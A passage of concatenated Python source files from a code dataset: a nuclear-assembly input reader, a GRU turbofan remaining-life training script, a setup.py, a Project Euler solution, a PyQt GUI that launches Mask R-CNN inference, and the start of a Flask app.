= 0\n self.number_particles_generation = 0\n self.kopts = False\n self.ksens = False\n self.assembly_perturbations = {}\n self.output_name = ''\n self.input_type = ''\n\n def read_input_file(self, assembly_name, **perturbations):\n \"\"\"Reads the yaml file for a FRIDGE input file and assigns any variables found.\"\"\"\n self.assembly_file_name = assembly_name\n cur_dir = os.path.dirname(__file__)\n input_dir = os.path.join(cur_dir, \"../fridge_input_file\")\n assembly_path = os.path.join(input_dir, self.assembly_file_name + '.yaml')\n assembly_file = glob.glob(assembly_path)\n print(assembly_name, assembly_file)\n print(assembly_path)\n with open(assembly_file[0], \"r\") as file:\n inputs = yaml.safe_load(file)\n\n self.file_name = inputs[\"Name\"]\n self.input_type = inputs[\"Input Type\"]\n self.output_name = inputs[\"Output File Name\"] \\\n if \"Output File Name\" in inputs else 'FRIDGe1'\n self.temperature = float(inputs[\"Temperature\"]) \\\n if 'Temperature' in inputs else 900\n self.temp_adjusted_density = bool(inputs[\"Temperature Adjusted Density\"]) \\\n if 'Temperature Adjusted Density' in inputs else False\n self.temp_adjusted_volume = bool(inputs[\"Temperature Adjusted Volume\"]) \\\n if 'Temperature Adjusted Volume' in inputs else False\n self.clad_smear = bool(inputs[\"Smear Clad\"]) \\\n if 'Smear Clad' in inputs else False\n self.bond_smear = bool(inputs[\"Smear Bond\"]) \\\n if 'Smear Bond' in inputs else False\n self.xc_library = inputs[\"XC Library\"] \\\n if 'XC Library' in inputs else ''\n self.number_generations = int(inputs[\"Number of Generations\"]) \\\n if 'Number of Generations' in inputs else 230\n self.number_skipped_generations = int(inputs[\"Number of Skipped Generations\"]) \\\n if 'Number of Skipped Generations' in inputs else 30\n self.number_particles_generation = int(float(inputs[\"Number of Particles per Generation\"])) \\\n if 'Number of Particles per Generation' in inputs else int(1e6)\n self.kopts = bool(inputs[\"Run Kinetics\"]) \\\n if 'Run Kinetics' in inputs else False\n self.ksens = bool(inputs[\"ksens\"]) \\\n if 'ksens' in inputs else False\n self.void_per = float(inputs[\"Void Percent\"]) \\\n if \"Void Percent\" in inputs else 1.0\n self.assembly_perturbations = inputs[\"Assembly Perturbations\"] \\\n if \"Assembly Perturbations\" in inputs else {}\n\n # Update for perturbations\n for k, v in perturbations.items():\n self.__setattr__(k, v)\n\n # Set the XC set depending on the temperature\n if self.temperature == 600:\n if self.xc_library == 'ENDFVII.1':\n self.xc_set = '.81c'\n elif self.xc_library == 'ENDFVII.0':\n self.xc_set = '.71c'\n elif self.xc_library == 'JEFF3.1':\n self.xc_set = '.34c'\n elif self.temperature == 900:\n if self.xc_library == 'ENDFVII.1':\n self.xc_set = '.82c'\n elif self.xc_library == 'ENDFVII.0':\n self.xc_set = '.72c'\n elif self.xc_library == 'JEFF3.1':\n self.xc_set = '.37c'\n elif self.temperature == 1200:\n if self.xc_library == 'ENDFVII.1':\n self.xc_set = '.83c'\n elif self.xc_library == 'ENDFVII.0':\n self.xc_set = '.73c'\n elif self.xc_library == 'JEFF3.1':\n self.xc_set = '.39c'\n\n def update_numbering(self):\n self.universe += 20\n self.cellNumber += 20\n self.surfaceNumber += 20\n self.materialNumber += 20\n","sub_path":"fridge/driver/global_variables.py","file_name":"global_variables.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"39842297","text":"import json\n\ndef BEGIN():\n\tres = [\"Name\",\"Age\"]\n\treturn res\n\n\ndef RUN(file_name):\n\tresult_file = file_name + \"_result\"\n\twith open(file_name + \".json\", \"r\") as input_data:\n\t\tparameters = json.load(input_data)\n\tresult = \"Hello, my name is \" + parameters[\"Name\"] + \" and I'm \" + parameters[\"Age\"] + \" years old.\"\n\tprint(result)\n\n\twith open(result_file + \".json\", \"w\") as output_data:\n\t\treport = {}\n\t\treport[\"title\"] = \"Test from name: \" + parameters[\"Name\"] + \" and age: \" + parameters[\"Age\"]\n\t\treport[\"result\"] = result\n\t\tjson.dump(report, output_data)","sub_path":"modules/test/module_test.py","file_name":"module_test.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"142246328","text":"# -*- coding: utf-8 -*-\r\n \r\nimport warnings\r\nfrom RNN_model import RNNTrainer\r\nimport random\r\n\r\n\r\nn = 10\r\nfor i in range(n):\r\n \r\n print('\\n')\r\n print('This is the {} run'.format(i+1))\r\n window_size, is_one_hot,is_op_factor, is_MOC_normal= 40,1,1,1\r\n Loss_function = 'SCORE'\r\n\r\n dropout_train = 0.5 ### default = 0,0.5\r\n NN_type = 'GRU' #LSTM, GRU, RNN\r\n num_layers = 2 #2\r\n sensor_feature_used = ['sensor 2', 'sensor 3', 'sensor 4', 'sensor 7', 'sensor 8', 'sensor 9',\r\n 'sensor 11', 'sensor 12', 'sensor 13', 'sensor 14', 'sensor 15',\r\n 'sensor 17', 'sensor 20', 'sensor 21']\r\n feature_used = sensor_feature_used + ['RUL']\r\n\r\n\r\n dataset_name, total_steps = 'FD001', 6000\r\n # dataset_name, total_steps = 'FD002', 6000\r\n #dataset_name, total_steps = 'FD003', 6000\r\n # dataset_name, total_steps = 'FD004', 12000\r\n \r\n\r\n if is_op_factor:\r\n feature_used += ['op factor']\r\n if is_one_hot:\r\n feature_used += [\"setting_op {}\".format(s) for s in range(1,7)]\r\n\r\n num_input = len(feature_used) - 1 #minus RUL\r\n patience = 3 #default = 3\r\n \r\n \r\n model = RNNTrainer(train_path = './data/%s/train_op.csv'%dataset_name, #train_op_normal\r\n test_path = './data/%s/test_op.csv'%dataset_name, #tets_op\r\n logger_path = './logs/',\r\n model_name = 'Turbofan_Test',\r\n dataset_name = dataset_name,\r\n train_log_interval = 100,\r\n valid_log_interval = 100,\r\n validation_split = 0.3,\r\n use_script=True,\r\n lr = 1e-4, #default = 4\r\n max_lr = 1e-2, #default = 2\r\n total_steps = total_steps,\r\n number_steps_train = window_size, \r\n hidden_size = 256,\r\n num_layers = num_layers,\r\n cell_type = NN_type, # neural network strature selected default = 'GRU'\r\n feature_used = feature_used,\r\n sensor_feature_used = sensor_feature_used,\r\n dropout_train = dropout_train,\r\n kernel_size=10,\r\n batch_size = 256, #default=256\r\n num_epoch = 100, #int(random.uniform(3, 30)), # epochs for training #default = 100\r\n number_features_input = num_input,\r\n number_features_output = 1,\r\n loss_function = Loss_function, \r\n optimizer = 'Adam',\r\n normalizer = 'Standardization',\r\n use_scheduler = 3, # use_scheduler = 3 : using cycling learning rate\r\n use_cuda = True,\r\n is_MOC_normal = is_MOC_normal\r\n )\r\n \r\n \r\n \r\n warnings.filterwarnings(\"ignore\")\r\n print('use_cuda:', model.use_cuda)\r\n \r\n model.train(patience) #default patience = 3\r\n\r\n\r\n \r\n import os, json, shutil\r\n import numpy as np\r\n import pandas as pd\r\n \r\n print(model.filelogger.path)\r\n model.get_best('load')\r\n \r\n predictions, labels = model.predict()\r\n # print(predictions.shape, labels.shape)\r\n df_test, results, mse, mae, r2, score, cra = model.postprocess(predictions, labels)\r\n \r\n \r\n # save the model with best results\r\n shutil.copyfile(model.get_best('save'),'./best/%s/%.3f.pth'%(dataset_name,score))\r\n print(\r\n dataset_name, '\\n',\r\n '='*36, '\\n',\r\n 'Score:\\t\\t%.4f'% score, '\\n',\r\n 'Accuracy:\\t%.4f'% (results['Accuracy'].mean()*100) , '\\n',\r\n 'RMSE:\\t\\t%.4f'% np.sqrt(mse), '\\n',\r\n 'mse:\\t\\t%.4f'% mse, '\\n',\r\n 'mae:\\t\\t%.4f'% mae, '\\n',\r\n 'score_avg:\\t%.4f'% results['Score'].mean(), '\\n',\r\n 'R2:\\t\\t%.4f'% r2, '\\n',\r\n 'CRA:\\t\\t%.4f'% cra, '\\n',\r\n 'dropout:\\t\\t%.1f'% dropout_train, '\\n',\r\n 'window_size:', window_size, '\\n',\r\n 'loss function', Loss_function, '\\n',\r\n 'NN_type',NN_type,'\\n',\r\n 'NN layers',num_layers,'\\n',\r\n 'Num feature',num_input,'\\n',\r\n 'patience',patience,'\\n',\r\n 'is_MOC_normal',is_MOC_normal,'\\n',\r\n 'feature used',feature_used,'\\n',\r\n '='*36)\r\n \r\n \r\n # save performance in txt file \r\n doc=open('./results/%s/2.txt'\r\n %(dataset_name),'a') \r\n print('\\n',file = doc)\r\n print(dataset_name,file=doc)\r\n print('='*36,file=doc)\r\n print('Score:\\t\\t%.4f'% score,file=doc)\r\n print('Accuracy:\\t%.4f'% (results['Accuracy'].mean()*100),file=doc )\r\n print('RMSE:\\t\\t%.4f'% np.sqrt(mse),file=doc)\r\n print('mse:\\t\\t%.4f'% mse,file=doc)\r\n print('mae:\\t\\t%.4f'% mae,file=doc)\r\n print('score_avg:\\t%.4f'% results['Score'].mean(),file=doc)\r\n print('R2:\\t\\t%.4f'% r2,file=doc)\r\n print('CRA:\\t\\t%.4f'% cra,file=doc)\r\n print('dropout:\\t\\t%.1f'% dropout_train,file=doc)\r\n print('window_size: ', window_size,file=doc)\r\n print('loss function: ', Loss_function,file=doc)\r\n print('NN_type: ', NN_type,file=doc)\r\n print('NN layers: ',num_layers,file=doc)\r\n print('Num feature: ',num_input,file=doc)\r\n print('patience: ',patience,file=doc)\r\n print('is_MOC_normal: ',is_MOC_normal,file=doc)\r\n print('feature used: ',feature_used,file=doc)\r\n print('='*36,file=doc)\r\n\r\n doc.close( )\r\n \r\n if not os.path.exists('./results/%s/Score(%.3f)W(%s)OP_factor(%s)one-hot(%s)RMSE(%.3f).txt'\r\n %(dataset_name,score,window_size,is_op_factor,is_one_hot,np.sqrt(mse))):\r\n os.rename('./results/%s/2.txt'\r\n %(dataset_name),'./results/%s/Score(%.3f)W(%s)OP_factor(%s)one-hot(%s)RMSE(%.3f).txt'\r\n %(dataset_name,score,window_size,is_op_factor,is_one_hot,np.sqrt(mse)),)\r\n print(\"performace results have been saved!\")\r\n # save results : predicted RUL and Real RUL\r\n dataframe = pd.DataFrame({'predictede RUL':results['Predicted_RUL'],'real_RUL':results['True_RUL']})\r\n \r\n # save the reults about 'predicted RUL' and 'real RUL'\r\n dataframe.to_csv(\"./results/%s/Test results_Score%.4fRMSE%.4f.csv\"%(dataset_name,score,np.sqrt(mse)),sep=',')\r\n df_test.to_csv('./results/{}/All resutls_Score{:.4f}RMSE{:.4f}.csv'.format(dataset_name,score,np.sqrt(mse)))\r\n \r\n print(\"RUL results have been saved\",'\\n')\r\n else:\r\n print('similary results!')\r\n\r\n\r\n","sub_path":"run_code.py","file_name":"run_code.py","file_ext":"py","file_size_in_byte":6584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"432652284","text":"\n#!/usr/bin/python\n\n# Copyright 2018 Altran\n# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# THIS FILE IS MANAGED BY THE GLOBAL REQUIREMENTS REPO - DO NOT EDIT\n# Copyright 2011 OpenStack, LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nfrom setuptools import setup, find_packages\n\nwith open('requirements.txt') as f:\n requirements = f.read().splitlines()\n\nif sys.version_info < (2, 7):\n requirements.append('argparse')\nelif sys.version_info < (2, 7):\n raise 'Must use python 2.7 or greater'\n\nwith open('README.rst') as f:\n long_description = f.read()\n\nsetup(\n name='EPEPIN API Server',\n version='1.0',\n author='Asgard Team',\n author_email='',\n description='Ericcson Cucumber Templates API Server',\n long_description=long_description, \n install_requires=requirements,\n packages=find_packages(exclude=['tests', '*.tests', '*.tests.*']),\n data_files=[('epepin_api/config', ['epepin_api/config/epepin_server.cfg'])],\n package_data={'': ['schemas/*.json']},\n license='Apache License 2.0',\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Natural Language :: English\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: System\"\n \"Framework :: Flask\"\n ],\n entry_points={\n 'console_scripts': [\n 'epepin=epepin_api.server:main',\n ],\n },\n\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515430146","text":"#!/usr/bin/env python3\n# Project Euler problem 33\nimport time\nimport sys\nsys.path.append('..')\nfrom functions import gcd\nstart_time = time.time()\n\nshared_digits = []\nfor N in range(10, 100):\n for D in range(N+1, 100):\n for digit in str(N):\n if digit != '0' and digit in str(D):\n shared_digits.append((N, D))\n break\n\n\ndef digit_cancel(N, D):\n\n N = str(N)\n D = str(D)\n\n for i, n_digit in enumerate(N):\n for j, d_digit in enumerate(D):\n if n_digit == d_digit:\n n = N[1-i]\n d = D[1-j]\n break\n\n return int(n), int(d)\n\n\nanswer = []\nfor N, D in shared_digits:\n\n n, d = digit_cancel(N, D)\n\n # trivial\n if D == 0 or d == 0:\n pass\n\n elif N / D == n / d:\n answer.append((N, D))\n\nn = d = 1\nfor i in answer:\n n *= i[0]\n d *= i[1]\n\n# denominator in lowerst common form\nanswer = int(d / gcd(n, d))\n\nend_time = time.time()\nrun_time = end_time - start_time\nprint(\"-------------------------------------------\")\nprint(\"| Solution to Project Euler problem 33 |\")\nprint(\"-------------------------------------------\")\nprint(\"Question: Find the smallest cube for which exactly five permutations of its digits are cube.\")\nprint(\"Answer: {:d}\".format(answer) )\nprint( \"Wall time: {:3.5f} seconds\".format(run_time))\n\n","sub_path":"33/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"565089614","text":"############################################################################\r\n## Author: Jiading Fang\r\n## Company: Mech-mind\r\n############################################################################\r\n\r\nimport sys\r\nimport os\r\nimport time\r\nimport subprocess\r\nfrom PyQt5.QtCore import QFile, QIODevice, QTextStream\r\nfrom PyQt5.QtWidgets import (QWidget, QLineEdit, QLabel,\r\n QGridLayout, QApplication, QPushButton, QFileDialog,\r\n QHBoxLayout, QVBoxLayout, QMessageBox, QComboBox)\r\n\r\nfrom Image_comparer.progressWindow import progressWindow\r\nfrom Image_comparer.Comparer import Comparer\r\nimport platform\r\n\r\nfrom enum import Enum\r\n\r\nclass Status(Enum):\r\n initial = 1\r\n infering = 2\r\n infered = 3\r\n\r\nclass Inferer(QWidget):\r\n\r\n def __init__(self, number_of_initial_models = 1):\r\n\r\n super().__init__()\r\n self.widget_id_generate_list = list(range(100000))\r\n self.widget_id_generate_list.reverse()\r\n plat_form = platform.system()\r\n if plat_form == 'Linux':\r\n self.default_script_path = os.path.expanduser(\"~/projects/MaskRCNN-Tensorflow/samples/coco/coco_infer.py\")\r\n elif plat_form == 'Windows':\r\n self.default_script_path =os.path.expanduser(\"D:/projects/MaskRCNN-Tensorflow/samples/coco/coco_infer.py\")\r\n\r\n self.initUI(number_of_initial_models)\r\n\r\n self.status = Status.initial\r\n\r\n\r\n def initUI(self, number_of_initial_models):\r\n\r\n self.widget_id_save_list = []\r\n\r\n # create header widgets\r\n self.source_image_folder_button = QPushButton('Source Image Folder')\r\n self.source_image_folder_lineEdit = QLineEdit()\r\n self.depth_image_folder_button = QPushButton('Depth Image Folder')\r\n self.depth_image_folder_lineEdit = QLineEdit()\r\n self.model_config_button = QPushButton('Model Config')\r\n self.model_config_lineEdit = QLineEdit()\r\n self.infer_script_path_button = QPushButton('Infer Script Path')\r\n self.infer_script_path_lineEdit = QLineEdit()\r\n\r\n self.color_type_label = QLabel('Color Type')\r\n self.color_type_combobox = QComboBox()\r\n self.color_type_combobox.addItem('instance')\r\n self.color_type_combobox.addItem('class')\r\n\r\n self.python_version_label = QLabel('Python Version')\r\n self.python_version_combobox = QComboBox()\r\n self.python_version_combobox.addItem('python')\r\n self.python_version_combobox.addItem('python2')\r\n self.python_version_combobox.addItem('python3')\r\n\r\n source_image_holder_hbox = QHBoxLayout()\r\n source_image_holder_hbox.addWidget(self.source_image_folder_button)\r\n source_image_holder_hbox.addWidget(self.source_image_folder_lineEdit)\r\n\r\n depth_image_holder_hbox = QHBoxLayout()\r\n depth_image_holder_hbox.addWidget(self.depth_image_folder_button)\r\n depth_image_holder_hbox.addWidget(self.depth_image_folder_lineEdit)\r\n\r\n model_config_hbox = QHBoxLayout()\r\n model_config_hbox.addWidget(self.model_config_button)\r\n model_config_hbox.addWidget(self.model_config_lineEdit)\r\n\r\n infer_script_path_hbox = QHBoxLayout()\r\n infer_script_path_hbox.addWidget(self.infer_script_path_button)\r\n infer_script_path_hbox.addWidget(self.infer_script_path_lineEdit)\r\n\r\n infer_settings_hbox = QHBoxLayout()\r\n infer_settings_hbox.addWidget(self.color_type_label)\r\n infer_settings_hbox.addWidget(self.color_type_combobox)\r\n infer_settings_hbox.addWidget(self.python_version_label)\r\n infer_settings_hbox.addWidget(self.python_version_combobox)\r\n\r\n self.header_vbox = QVBoxLayout()\r\n self.header_vbox.addLayout(source_image_holder_hbox)\r\n self.header_vbox.addLayout(depth_image_holder_hbox)\r\n self.header_vbox.addLayout(model_config_hbox)\r\n self.header_vbox.addLayout(infer_script_path_hbox)\r\n self.header_vbox.addLayout(infer_settings_hbox)\r\n\r\n self.model_path_buttons = {}\r\n self.model_path_lineEdits = {}\r\n self.save_folder_buttons = {}\r\n self.save_folder_lineEdits = {}\r\n self.delete_buttons = {}\r\n\r\n for which_model in range(number_of_initial_models):\r\n self.buttonClickedAddModel()\r\n\r\n self.add_model_button = QPushButton('Add Model')\r\n self.infer_button = QPushButton('Infer')\r\n\r\n # set up signals and slots for widgets\r\n self.source_image_folder_button.clicked.connect(self.buttonClickedGetSourceImageFolder)\r\n self.depth_image_folder_button.clicked.connect(self.buttonClickedGetDepthImageFolder)\r\n self.model_config_button.clicked.connect(self.buttonClickedGetModelConfig)\r\n self.infer_script_path_button.clicked.connect(self.buttonClickedGetInferScriptPath)\r\n self.add_model_button.clicked.connect(self.buttonClickedAddModel)\r\n self.infer_button.clicked.connect(self.buttonClickedInfer)\r\n\r\n # create window layout\r\n self.header_grid_layout = QGridLayout()\r\n self.header_button_hbox = QHBoxLayout()\r\n self.window_vbox = QVBoxLayout()\r\n\r\n # set up initial header layout\r\n self.header_button_hbox.addWidget(self.add_model_button)\r\n self.header_button_hbox.addStretch(1)\r\n self.header_button_hbox.addWidget(self.infer_button)\r\n\r\n self.window_vbox.addLayout(self.header_vbox)\r\n self.window_vbox.addLayout(self.header_button_hbox)\r\n\r\n # set up window display\r\n self.setLayout(self.window_vbox)\r\n self.setWindowTitle('Inferer')\r\n\r\n # infered flag\r\n self.infered_flag = False\r\n # set finished flag\r\n self.finished_flag = False\r\n\r\n def buttonClickedGetSourceImageFolder(self):\r\n\r\n folder_name = QFileDialog.getExistingDirectory(self, 'Select Source Image Folder')\r\n self.source_image_folder_lineEdit.setText(str(folder_name))\r\n\r\n def buttonClickedGetDepthImageFolder(self):\r\n\r\n folder_name = QFileDialog.getExistingDirectory(self, 'Select Depth Image Folder')\r\n self.depth_image_folder_lineEdit.setText(str(folder_name))\r\n\r\n def buttonClickedGetModelConfig(self):\r\n\r\n config_name = QFileDialog.getOpenFileName(self, 'Select Model Config', self.tr(\"*yml\"))\r\n self.model_config_lineEdit.setText(str(config_name[0]))\r\n\r\n def buttonClickedGetInferScriptPath(self):\r\n\r\n path_name = QFileDialog.getOpenFileName(self, 'Select Infer Script', self.default_script_path)\r\n self.infer_script_path_lineEdit.setText(str(path_name[0]))\r\n\r\n def buttonClickedGetModelPath(self, widget_id):\r\n\r\n path_name = QFileDialog.getOpenFileName(self, 'Select Model Path')\r\n self.model_path_lineEdits[widget_id].setText(str(path_name[0]))\r\n\r\n def buttonClickedGetSaveFolder(self, widget_id):\r\n\r\n folder_name = QFileDialog.getExistingDirectory(self, 'Select Infer results Save Folder')\r\n self.save_folder_lineEdits[widget_id].setText(str(folder_name))\r\n\r\n def buttonClickedAddModel(self):\r\n\r\n widget_id = self.widget_id_generate_list.pop()\r\n\r\n #number_of_existing_models = len(self.model_path_buttons)\r\n self.widget_id_save_list.append(widget_id)\r\n\r\n # create new widgets\r\n new_model_path_button = QPushButton('Model Path')\r\n self.model_path_buttons[widget_id] = new_model_path_button\r\n new_model_path_lineEdit = QLineEdit()\r\n self.model_path_lineEdits[widget_id] = new_model_path_lineEdit\r\n new_save_folder_button = QPushButton('Save Folder')\r\n self.save_folder_buttons[widget_id] = new_save_folder_button\r\n new_save_folder_lineEdit = QLineEdit()\r\n self.save_folder_lineEdits[widget_id] = new_save_folder_lineEdit\r\n new_delete_button = QPushButton('Delete')\r\n self.delete_buttons[widget_id] = new_delete_button\r\n\r\n # set up signals and slots for new widgets\r\n new_model_path_button.clicked.connect(lambda: self.buttonClickedGetModelPath(widget_id))\r\n new_save_folder_button.clicked.connect(lambda: self.buttonClickedGetSaveFolder(widget_id))\r\n new_delete_button.clicked.connect(lambda: self.buttonClickedDeleteModel(widget_id))\r\n\r\n new_model_hbox = QHBoxLayout()\r\n\r\n # set up layout\r\n new_model_hbox.addWidget(new_model_path_button)\r\n new_model_hbox.addWidget(new_model_path_lineEdit)\r\n new_model_hbox.addWidget(new_save_folder_button)\r\n new_model_hbox.addWidget(new_save_folder_lineEdit)\r\n new_model_hbox.addWidget(new_delete_button)\r\n\r\n self.header_vbox.addLayout(new_model_hbox)\r\n\r\n def buttonClickedDeleteModel(self, widget_id):\r\n\r\n number_of_existing_models = len(self.model_path_buttons)\r\n\r\n if number_of_existing_models < 2:\r\n QMessageBox.warning(self, 'Error Message', 'Not enough models, you need to keep at least 1 model.')\r\n return 0\r\n\r\n removed_model_path_button = self.model_path_buttons.pop(widget_id)\r\n removed_model_path_lineEdit = self.model_path_lineEdits.pop(widget_id)\r\n removed_save_path_button = self.save_folder_buttons.pop(widget_id)\r\n removed_save_path_lineEdit = self.save_folder_lineEdits.pop(widget_id)\r\n removed_delete_button = self.delete_buttons.pop(widget_id)\r\n\r\n self.widget_id_save_list.remove(widget_id)\r\n \r\n self.header_vbox.removeWidget(removed_model_path_button)\r\n self.header_vbox.removeWidget(removed_model_path_lineEdit)\r\n self.header_vbox.removeWidget(removed_save_path_button)\r\n self.header_vbox.removeWidget(removed_save_path_lineEdit)\r\n self.header_vbox.removeWidget(removed_delete_button)\r\n\r\n removed_model_path_button.hide()\r\n removed_model_path_lineEdit.hide()\r\n removed_save_path_button.hide()\r\n removed_save_path_lineEdit.hide()\r\n removed_delete_button.hide()\r\n\r\n def switchFromIntialToInfering(self):\r\n self.status = Status.infering\r\n self.enabledAllButtons(False)\r\n\r\n def switchFromInferingToInfered(self):\r\n self.status = Status.infered\r\n self.enabledAllButtons(True)\r\n\r\n def switchFromInferedToInfering(self):\r\n self.status = Status.infering\r\n self.enabledAllButtons(False)\r\n self.infer_progress_window.hide()\r\n self.window_vbox.removeWidget(self.infer_progress_window)\r\n\r\n def enabledAllButtons(self,enabled):\r\n self.source_image_folder_button.setEnabled(enabled)\r\n self.depth_image_folder_button.setEnabled(enabled)\r\n self.model_config_button.setEnabled(enabled)\r\n self.infer_script_path_button.setEnabled(enabled)\r\n for model_path_button in self.model_path_buttons.values():\r\n model_path_button.setEnabled(enabled)\r\n for save_floder_button in self.save_folder_buttons.values():\r\n save_floder_button.setEnabled(enabled)\r\n for delete_button in self.delete_buttons.values():\r\n delete_button.setEnabled(enabled)\r\n self.add_model_button.setEnabled(enabled)\r\n self.infer_button.setEnabled(enabled)\r\n self.color_type_combobox.setEnabled(enabled)\r\n self.python_version_combobox.setEnabled(enabled)\r\n\r\n def buttonClickedInfer(self):\r\n\r\n class inferProgressWindow(progressWindow):\r\n\r\n def __init__(self):\r\n\r\n super().__init__()\r\n\r\n # add compare button to hbox\r\n self.body_button_hbox = QHBoxLayout()\r\n self.compare_button = QPushButton('Compare')\r\n self.body_button_hbox.addStretch(1)\r\n self.body_button_hbox.addWidget(self.compare_button)\r\n self.body_vbox.addLayout(self.body_button_hbox)\r\n\r\n\r\n\r\n if any(len(os.listdir(save_folder_lineEdit.text())) > 0 for save_folder_lineEdit in self.save_folder_lineEdits.values()):\r\n QMessageBox.warning(self, 'Error Message', 'Each save folder must be empty, please check if there is anything in the folder.')\r\n return\r\n\r\n if self.status is Status.initial:\r\n self.switchFromIntialToInfering()\r\n elif self.status is Status.infered:\r\n ret = QMessageBox.question(self, \"Re-Infer Dialog\", \"Are you sure you want to Re-Infer?\")\r\n if ret == QMessageBox.Yes:\r\n self.switchFromInferedToInfering()\r\n else:\r\n return\r\n\r\n # add progress window\r\n self.infer_progress_window = inferProgressWindow()\r\n self.infer_progress_window.addMultipleProgress(len(self.model_path_buttons))\r\n self.infer_progress_window.compare_button.clicked.connect(self.buttonClickedCompare)\r\n self.window_vbox.addWidget(self.infer_progress_window)\r\n\r\n for which_model, widget_id in enumerate(self.model_path_buttons):\r\n time_stamp = int(time.time()*10e6)\r\n config_file_name = 'config_' + str(time_stamp) + '.yml'\r\n current_directory = os.getcwd()\r\n if not os.path.isdir('configs'):\r\n os.mkdir('configs')\r\n config_file_path = os.path.join(current_directory, 'configs', config_file_name)\r\n\r\n error = None\r\n config_file = None\r\n try:\r\n config_file = QFile(config_file_path)\r\n if not config_file.open(QIODevice.WriteOnly):\r\n raise IOError(str(config_file.errorString()))\r\n config_stream = QTextStream(config_file)\r\n config_stream.setCodec('UTF-8')\r\n config_stream << 'infer_settings:\\n'\r\n config_stream << ' save_dir: ' << self.save_folder_lineEdits[widget_id].text() << '\\n'\r\n config_stream << ' restore_from: ' << self.model_path_lineEdits[widget_id].text() << '\\n'\r\n config_stream << ' data_dir: ' << self.source_image_folder_lineEdit.text() << '\\n'\r\n config_stream << ' depth_dir: ' << self.depth_image_folder_lineEdit.text() << '\\n'\r\n config_stream << ' model_config: ' << self.model_config_lineEdit.text() << '\\n'\r\n config_stream << ' #color_type candidates: \\'instance\\',\\'class\\' ' << '\\n'\r\n config_stream << ' color_type: ' << self.color_type_combobox.currentText() << '\\n'\r\n\r\n print(\"Saved config file as {0}\".format(config_file_path))\r\n except EnvironmentError as e:\r\n error = \"Failed to save {0} because of {1}\".format(config_file_name, e)\r\n finally:\r\n if config_file is not None:\r\n config_file.close()\r\n if error is not None:\r\n print(error)\r\n\r\n # start inference subprocess\r\n python_version = str(self.python_version_combobox.currentText())\r\n subprocess_args = python_version + ' ' + self.infer_script_path_lineEdit.text() + ' ' + config_file_path\r\n\r\n p = subprocess.Popen(subprocess_args, shell=True)\r\n number_of_source_images = len(os.listdir(self.source_image_folder_lineEdit.text()))\r\n\r\n while p.poll() is None:\r\n number_of_saved_images = len(os.listdir(self.save_folder_lineEdits[widget_id].text()))\r\n self.infer_progress_window.progress_bars[which_model].setValue(number_of_saved_images/number_of_source_images*100)\r\n QApplication.processEvents()\r\n\r\n QMessageBox.warning(self, 'Success Message', 'The infer process has successfully finished!')\r\n self.switchFromInferingToInfered()\r\n\r\n\r\n def buttonClickedCompare(self):\r\n self.infer_result_comparer = Comparer(len(self.model_path_lineEdits))\r\n for inferer_widget_id in self.model_path_lineEdits:\r\n self.infer_result_comparer.multi_select_dialog.add_one_dir(self.save_folder_lineEdits[inferer_widget_id].text())\r\ndef main():\r\n app = QApplication(sys.argv)\r\n ex = Inferer()\r\n sys.exit(app.exec_())\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"dataset_tools/src/Image_comparer/InfererMaskRCNN.py","file_name":"InfererMaskRCNN.py","file_ext":"py","file_size_in_byte":15968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"81958863","text":"from flask import Flask, g\nfrom flask.ext.mongoengine import MongoEngine\nfrom flask.ext.login import LoginManager, current_user\n\nfrom jinja2 import FileSystemLoader\n\nfrom yota.renderers import JinjaRenderer\nfrom yota import Form\n\nfrom weekly import data\n\nimport babel.dates as dates\nimport os\n\nroot = os.path.abspath(os.path.dirname(__file__) + '/../')\n\n# initialize our flask application\napp = Flask(__name__, static_folder='../static', static_url_path='/static')\n\n# Setup login stuff\nlm = LoginManager()\nlm.init_app(app)\nlm.login_view = 'login'\n\n# set our template path\napp.jinja_loader = FileSystemLoader(os.path.join(root, 'templates'))\n# setup mongo connection information\napp.config[\"MONGODB_SETTINGS\"] = {'DB': \"weekly\"}\napp.config[\"SECRET_KEY\"] = \"KeepThisS3cr3t\"\ndb = MongoEngine(app)\n\n\n# patch yota to use bootstrap3\nJinjaRenderer.templ_type = 'bs3'\nJinjaRenderer.search_path.insert(0, root + \"/templates/yota/\")\nForm.type_class_map = {'error': 'alert alert-danger',\n 'info': 'alert alert-info',\n 'success': 'alert alert-success',\n 'warn': 'alert alert-warning'}\n\n# General configuration\n# ======================\n\n# Add a date format 